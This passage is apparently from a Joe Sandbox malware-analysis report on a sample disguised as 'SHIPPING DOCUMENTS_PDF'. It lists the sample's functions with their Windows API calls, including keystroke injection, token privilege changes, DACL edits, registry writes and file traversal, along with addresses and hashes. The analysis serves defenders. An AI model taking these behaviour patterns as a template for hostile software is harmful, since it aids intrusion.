                                                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00BDD06D
                                                                                    • GetCursorPos.USER32(?), ref: 00BDD08D
                                                                                    • ScreenToClient.USER32(?,?), ref: 00BDD09A
                                                                                    • GetParent.USER32(?), ref: 00BDD0BA
                                                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00BDD123
                                                                                    • SendMessageW.USER32 ref: 00BDD154
                                                                                    • ClientToScreen.USER32(?,?), ref: 00BDD1B2
                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00BDD1E2
                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00BDD20C
                                                                                    • SendMessageW.USER32 ref: 00BDD22F
                                                                                    • ClientToScreen.USER32(?,?), ref: 00BDD281
                                                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00BDD2B5
                                                                                      • Part of subcall function 00B525DB: GetWindowLongW.USER32(?,000000EB), ref: 00B525EC
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00BDD351
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                    • String ID: @GUI_DRAGID$F
                                                                                    • API String ID: 3977979337-4164748364
                                                                                    • Opcode ID: e6c49ac00c36340407ae700e685472dab2fb80c68cb11a442ad012de0cb4a759
                                                                                    • Instruction ID: d06289ca1c0c7b3196f5f841f48bff2ef0cc24384dc1da856810b8d2fcf3e622
                                                                                    • Opcode Fuzzy Hash: e6c49ac00c36340407ae700e685472dab2fb80c68cb11a442ad012de0cb4a759
                                                                                    • Instruction Fuzzy Hash: 0742BC74209246AFDB24CF28C884BAAFFE5FF49310F14459AF696873A0E731D845DB91
                                                                                    Function 00BD7DDB Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00BD84D0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID: %d/%02d/%02d
                                                                                    • API String ID: 3850602802-328681919
                                                                                    • Opcode ID: d183aefcd4aaa3f3f6c8c9fef30a2d432c59495d8eb21a14146d9261be2ad4ff
                                                                                    • Instruction ID: caf67bc8870f5ad8b48dc5fd3a198708cf42bdc1272035034c63ce28a15ac5ae
                                                                                    • Opcode Fuzzy Hash: d183aefcd4aaa3f3f6c8c9fef30a2d432c59495d8eb21a14146d9261be2ad4ff
                                                                                    • Instruction Fuzzy Hash: 1D12CF70505205ABEB259F64CC49FABBBE4EB45311F1481AAF91AEB3E1EF708941CB50
                                                                                    Function 00B66F9E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5018COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove$_memset
                                                                                    • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                                                    • API String ID: 1357608183-1798697756
                                                                                    • Opcode ID: 091e7272ccc4847613a37599495c399c74234575d1d82e7fc23590a78471346f
                                                                                    • Instruction ID: beb77bf9a6d616040578a70228f72fec8323b96cdef5f26b7808fd36ee06772a
                                                                                    • Opcode Fuzzy Hash: 091e7272ccc4847613a37599495c399c74234575d1d82e7fc23590a78471346f
                                                                                    • Instruction Fuzzy Hash: 2593A171A48215DFDB24CF98C881BADB7F1FF49714F2485AAE945AB380E7749E81CB40
                                                                                    Function 00B548D7 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32(00000000,?), ref: 00B548DF
                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B8D665
                                                                                    • IsIconic.USER32(?), ref: 00B8D66E
                                                                                    • ShowWindow.USER32(?,00000009), ref: 00B8D67B
                                                                                    • SetForegroundWindow.USER32(?), ref: 00B8D685
                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B8D69B
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00B8D6A2
                                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B8D6AE
                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00B8D6BF
                                                                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00B8D6C7
                                                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 00B8D6CF
                                                                                    • SetForegroundWindow.USER32(?), ref: 00B8D6D2
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B8D6E7
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00B8D6F2
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B8D6FC
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00B8D701
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B8D70A
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00B8D70F
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00B8D719
                                                                                    • keybd_event.USER32(00000012,00000000), ref: 00B8D71E
                                                                                    • SetForegroundWindow.USER32(?), ref: 00B8D721
                                                                                    • AttachThreadInput.USER32(?,?,00000000), ref: 00B8D748
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                    • String ID: Shell_TrayWnd
                                                                                    • API String ID: 4125248594-2988720461
                                                                                    • Opcode ID: bf17b60b67f9c9877f051994ace877b1b1f22c8c168d5e511de9a4d55a2a35d2
                                                                                    • Instruction ID: ce7157f824bea81dc180b1668a9aa3e8450b7f98420302dd107e3e643f4f4b30
                                                                                    • Opcode Fuzzy Hash: bf17b60b67f9c9877f051994ace877b1b1f22c8c168d5e511de9a4d55a2a35d2
                                                                                    • Instruction Fuzzy Hash: 59317771A453187AEB206F619C89F7F7F6CEB44B50F104066FA05EB1E1DA705D00EBA0
                                                                                    Function 00BA8310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00BA87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00BA882B
                                                                                      • Part of subcall function 00BA87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00BA8858
                                                                                      • Part of subcall function 00BA87E1: GetLastError.KERNEL32 ref: 00BA8865
                                                                                    • _memset.LIBCMT ref: 00BA8353
                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00BA83A5
                                                                                    • CloseHandle.KERNEL32(?), ref: 00BA83B6
                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00BA83CD
                                                                                    • GetProcessWindowStation.USER32 ref: 00BA83E6
                                                                                    • SetProcessWindowStation.USER32(00000000), ref: 00BA83F0
                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00BA840A
                                                                                      • Part of subcall function 00BA81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00BA8309), ref: 00BA81E0
                                                                                      • Part of subcall function 00BA81CB: CloseHandle.KERNEL32(?,?,00BA8309), ref: 00BA81F2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                    • String ID: $default$winsta0
                                                                                    • API String ID: 2063423040-1027155976
                                                                                    • Opcode ID: f0cafbf02f5bb11b3b125d39485f2fe7ad6f1891a8d04852679564b91f82c0bb
                                                                                    • Instruction ID: e2e797c9590b33d9d85ce170dbedc62a5606bd4c5885aac5af0b669dfb8f1c12
                                                                                    • Opcode Fuzzy Hash: f0cafbf02f5bb11b3b125d39485f2fe7ad6f1891a8d04852679564b91f82c0bb
                                                                                    • Instruction Fuzzy Hash: 9B814B71D09209AFDF119FA4CC45AEEBBF9EF05304F1481AAFD15A6661EB318E14DB20
                                                                                    Function 00BBC75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00BBC78D
                                                                                    • FindClose.KERNEL32(00000000), ref: 00BBC7E1
                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00BBC806
                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00BBC81D
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00BBC844
                                                                                    • __swprintf.LIBCMT ref: 00BBC890
                                                                                    • __swprintf.LIBCMT ref: 00BBC8D3
                                                                                      • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                                                    • __swprintf.LIBCMT ref: 00BBC927
                                                                                      • Part of subcall function 00B73698: __woutput_l.LIBCMT ref: 00B736F1
                                                                                    • __swprintf.LIBCMT ref: 00BBC975
                                                                                      • Part of subcall function 00B73698: __flsbuf.LIBCMT ref: 00B73713
                                                                                      • Part of subcall function 00B73698: __flsbuf.LIBCMT ref: 00B7372B
                                                                                    • __swprintf.LIBCMT ref: 00BBC9C4
                                                                                    • __swprintf.LIBCMT ref: 00BBCA13
                                                                                    • __swprintf.LIBCMT ref: 00BBCA62
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                    • API String ID: 3953360268-2428617273
                                                                                    • Opcode ID: adf568ddc1840f4af5eb670bff1104d36ae765c2e56759234714a47a40f47289
                                                                                    • Instruction ID: 176cd7363fccc651d794aeca97498ee8b67e3c9d0d8229cb1da0fb610288eb05
                                                                                    • Opcode Fuzzy Hash: adf568ddc1840f4af5eb670bff1104d36ae765c2e56759234714a47a40f47289
                                                                                    • Instruction Fuzzy Hash: F1A11FB1508305ABC710EF94CC95EBFB7ECEF98701F4049A9F99586191EB35DA08CB62
                                                                                    Function 00BBEF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00BBEFB6
                                                                                    • _wcscmp.LIBCMT ref: 00BBEFCB
                                                                                    • _wcscmp.LIBCMT ref: 00BBEFE2
                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00BBEFF4
                                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00BBF00E
                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00BBF026
                                                                                    • FindClose.KERNEL32(00000000), ref: 00BBF031
                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00BBF04D
                                                                                    • _wcscmp.LIBCMT ref: 00BBF074
                                                                                    • _wcscmp.LIBCMT ref: 00BBF08B
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00BBF09D
                                                                                    • SetCurrentDirectoryW.KERNEL32(00C08920), ref: 00BBF0BB
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BBF0C5
                                                                                    • FindClose.KERNEL32(00000000), ref: 00BBF0D2
                                                                                    • FindClose.KERNEL32(00000000), ref: 00BBF0E4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                    • String ID: *.*
                                                                                    • API String ID: 1803514871-438819550
                                                                                    • Opcode ID: 783977bdc71e10a349c8d7063d800573dc1ccf3cf6bfad31819151ed77331f7e
                                                                                    • Instruction ID: e59da4f38bbdfa7f468280c9c39da89e82ab13376215a8fa98f9fdc17788d1cb
                                                                                    • Opcode Fuzzy Hash: 783977bdc71e10a349c8d7063d800573dc1ccf3cf6bfad31819151ed77331f7e
                                                                                    • Instruction Fuzzy Hash: 9631F03250520A6BDB14AFA4DC59AFEB7ECDF48360F0441B2F845E30A1EFB0DA44CA64
                                                                                    Function 00BD0857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BD0953
                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00BDF910,00000000,?,00000000,?,?), ref: 00BD09C1
                                                                                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00BD0A09
                                                                                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00BD0A92
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00BD0DB2
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00BD0DBF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close$ConnectCreateRegistryValue
                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                    • API String ID: 536824911-966354055
                                                                                    • Opcode ID: f29a47fdd8f50f2a647436d6252cfa7a0af105520a5b9e4df9356ab18ec96395
                                                                                    • Instruction ID: f07defda9d4ccd3e9f470572bb884fbde672b96a571506c22aa275710b47653d
                                                                                    • Opcode Fuzzy Hash: f29a47fdd8f50f2a647436d6252cfa7a0af105520a5b9e4df9356ab18ec96395
                                                                                    • Instruction Fuzzy Hash: 500238756146019FCB14EF24C891E2AB7E5FF89314F0485ADF89A9B3A2DB30ED45CB81
                                                                                    Function 00BBF0F2 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00BBF113
                                                                                    • _wcscmp.LIBCMT ref: 00BBF128
                                                                                    • _wcscmp.LIBCMT ref: 00BBF13F
                                                                                      • Part of subcall function 00BB4385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00BB43A0
                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00BBF16E
                                                                                    • FindClose.KERNEL32(00000000), ref: 00BBF179
                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00BBF195
                                                                                    • _wcscmp.LIBCMT ref: 00BBF1BC
                                                                                    • _wcscmp.LIBCMT ref: 00BBF1D3
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00BBF1E5
                                                                                    • SetCurrentDirectoryW.KERNEL32(00C08920), ref: 00BBF203
                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00BBF20D
                                                                                    • FindClose.KERNEL32(00000000), ref: 00BBF21A
                                                                                    • FindClose.KERNEL32(00000000), ref: 00BBF22C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                    • String ID: *.*
                                                                                    • API String ID: 1824444939-438819550
                                                                                    • Opcode ID: fb50102ed63f67980684f06a3e2a18d080ebf511ccc7beabeff2e0052c46d35b
                                                                                    • Instruction ID: 13a97df6b35d0823ca46f21199c4ada0b3f37d3a1da10626d1225ba958db950d
                                                                                    • Opcode Fuzzy Hash: fb50102ed63f67980684f06a3e2a18d080ebf511ccc7beabeff2e0052c46d35b
                                                                                    • Instruction Fuzzy Hash: 3131E23650121B6BCB10AFA4EC59AFEB7ECDF45320F1041F2F854A30A0EB70DA45CA54
                                                                                    Function 00BBA1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00BBA20F
                                                                                    • __swprintf.LIBCMT ref: 00BBA231
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00BBA26E
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00BBA293
                                                                                    • _memset.LIBCMT ref: 00BBA2B2
                                                                                    • _wcsncpy.LIBCMT ref: 00BBA2EE
                                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00BBA323
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00BBA32E
                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00BBA337
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00BBA341
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                    • String ID: :$\$\??\%s
                                                                                    • API String ID: 2733774712-3457252023
                                                                                    • Opcode ID: f4be87ddd25d3d9323d3575d2d4d1da8c6616728d92faf479e65612e5d117361
                                                                                    • Instruction ID: 5881a857165c9c2d676ab1b8df6849869d6cc461bd6ac88012b660934d0f8c50
                                                                                    • Opcode Fuzzy Hash: f4be87ddd25d3d9323d3575d2d4d1da8c6616728d92faf479e65612e5d117361
                                                                                    • Instruction Fuzzy Hash: 8D318DB190410AABDB219FA4DC49FFB77FCEF89740F1041B6F509D2160EBB096448B29
                                                                                    Function 00BA7CAF Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00BA8202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00BA821E
                                                                                      • Part of subcall function 00BA8202: GetLastError.KERNEL32(?,00BA7CE2,?,?,?), ref: 00BA8228
                                                                                      • Part of subcall function 00BA8202: GetProcessHeap.KERNEL32(00000008,?,?,00BA7CE2,?,?,?), ref: 00BA8237
                                                                                      • Part of subcall function 00BA8202: HeapAlloc.KERNEL32(00000000,?,00BA7CE2,?,?,?), ref: 00BA823E
                                                                                      • Part of subcall function 00BA8202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00BA8255
                                                                                      • Part of subcall function 00BA829F: GetProcessHeap.KERNEL32(00000008,00BA7CF8,00000000,00000000,?,00BA7CF8,?), ref: 00BA82AB
                                                                                      • Part of subcall function 00BA829F: HeapAlloc.KERNEL32(00000000,?,00BA7CF8,?), ref: 00BA82B2
                                                                                      • Part of subcall function 00BA829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00BA7CF8,?), ref: 00BA82C3
                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00BA7D13
                                                                                    • _memset.LIBCMT ref: 00BA7D28
                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00BA7D47
                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00BA7D58
                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00BA7D95
                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00BA7DB1
                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00BA7DCE
                                                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00BA7DDD
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00BA7DE4
                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00BA7E05
                                                                                    • CopySid.ADVAPI32(00000000), ref: 00BA7E0C
                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00BA7E3D
                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00BA7E63
                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00BA7E77
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
